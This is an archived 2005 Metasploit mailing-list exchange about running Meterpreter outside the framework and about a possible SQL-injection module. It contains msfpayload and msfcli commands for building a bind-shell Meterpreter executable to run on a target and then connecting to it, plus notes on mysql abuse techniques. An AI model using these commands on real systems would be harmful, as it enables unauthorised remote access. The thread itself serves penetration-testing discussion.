Metasploit mailing list archives

using Meterpreter , out of MSF

From: elite_netbios at yahoo.com (Hamid . K)
Date: Wed, 26 Oct 2005 03:03:33 -0700 (PDT)

Hi 

Thank you both for answers ,
but , I guess something is wrong here with
me , or the method HDM mentioned :

$ ./msfpayload win32_bind_meterpreter LPORT=4321 X
Warning: Multistage payloads only return first stage
...

as meterpreter is a staged one , I guess this error is
the reason of my failed test :)
after running generated excuteable file , no port is
opened , nor meterpreter client can connect to box.

I`ll keep trying ...

regards
Hamid.

--- H D Moore <hdm at metasploit.com> wrote:

On Tuesday 25 October 2005 19:07, Hamid . K wrote:

I was curious , if anyone tried to load

meterpreter

library , out of framework ?


The easy way:
$ msfpayload win32_bind_meterpreter LPORT=4321 X >
met.exe

Copy this executable to the target system and find
some way to execute it. 
After executing it, you can use the
"payload_handler" exploit to connect 
and interact with it:
$ msfcli payload_handler
PAYLOAD=win32_bind_meterpreter LPORT=4321 \
RHOST=<target_system> E

Alternatively, you can use the source code in ./src
and just build your 
own client/server implementation using it.

Second ;
Is the idea of adding an automated sql-injection
module to MSF .


The problem there is that version 2.x is
exploit-driven - if you can't use 
one of the standard payloads or accomplish a very
specific task, then it 
means writing a whole library around
post-sql-injection remote 
compromise. Adding a mysql module means creating
paylaods for uploading 
files or executing commands via the mysql stored
procedures (load data 
infile, the UDF stuff that abuses blank passwords,
etc). If someone came 
up with some plausible/useful payloads that would
work with generic SQL 
injection, I would definitely be interested in
integrating it. Version 
3.x is going to include "recon" modules, so a
generic table enumeration 
module would fit into it much better than 2.x.

-HD




        
                
__________________________________ 
Yahoo! Mail - PC Magazine Editors' Choice 2005 
http://mail.yahoo.com

Current thread:

using Meterpreter , out of MSF // SQL Injection module Hamid . K (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module str0ke (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module H D Moore (Oct 25)
  - using Meterpreter , out of MSF Hamid . K (Oct 26)
  - using Meterpreter , out of MSF // SQL Injection module RaMatkal (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Jerome Athias (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module news-letters (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Fabrice MOURRON (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Andre Ludwig (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Kurt Grutzmacher (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module jasf (Oct 27)
- <Possible follow-ups>
- using Meterpreter , out of MSF // SQL Injection module ahead at mediageneral.com (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Tim Brown (Oct 28)

(Thread continues...)